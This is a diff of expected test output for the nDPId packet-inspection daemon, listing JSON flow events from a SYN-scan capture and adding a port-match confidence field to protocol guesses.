 00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":497,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00586{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":497,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":497,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00593{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":886,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":500,"l4_proto":"tcp","ndpi": {"proto":"IPsec","breed":"Safe","category":"VPN"}}
+00629{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":886,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":500,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"IPsec","breed":"Safe","category":"VPN"}}
 00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":886,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00593{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":969,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":500,"l4_proto":"tcp","ndpi": {"proto":"IPsec","breed":"Safe","category":"VPN"}}
+00629{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":969,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":500,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"IPsec","breed":"Safe","category":"VPN"}}
 00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":969,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00588{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1826,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061157,"flow_last_seen":1278275061157,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6646,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1826,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061157,"flow_last_seen":1278275061157,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6646,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -6254,11 +6254,11 @@
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1341,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":513,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1404,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":513,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1404,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":513,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00602{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":514,"l4_proto":"tcp","ndpi": {"proto":"Syslog","breed":"Acceptable","category":"System"}}
+00638{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":514,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Syslog","breed":"Acceptable","category":"System"}}
 00570{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":514,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1623,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060900,"flow_last_seen":1278275060900,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":515,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1623,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060900,"flow_last_seen":1278275060900,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":515,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00603{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":514,"l4_proto":"tcp","ndpi": {"proto":"Syslog","breed":"Acceptable","category":"System"}}
+00639{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":514,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Syslog","breed":"Acceptable","category":"System"}}
 00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":514,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1682,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":515,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1682,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":515,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -6308,11 +6308,11 @@
 00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":963,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":545,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00588{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1541,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6692,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1541,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6692,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00605{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":548,"l4_proto":"tcp","ndpi": {"proto":"AFP","breed":"Acceptable","category":"DataTransfer"}}
+00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":548,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"AFP","breed":"Acceptable","category":"DataTransfer"}}
 00570{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":548,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00588{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1612,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6692,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1612,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6692,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00605{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":548,"l4_proto":"tcp","ndpi": {"proto":"AFP","breed":"Acceptable","category":"DataTransfer"}}
+00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":548,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"AFP","breed":"Acceptable","category":"DataTransfer"}}
 00570{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":548,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00589{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":41511,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00574{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":41511,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -6324,7 +6324,7 @@
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2602,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":960,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2601,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":960,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00592{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":554,"l4_proto":"tcp","ndpi": {"proto":"RTSP","breed":"Fun","category":"Media"}}
+00628{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":554,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"RTSP","breed":"Fun","category":"Media"}}
 00570{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":554,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00588{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1315,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2602,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1315,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2602,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -6332,23 +6332,23 @@
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6699,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
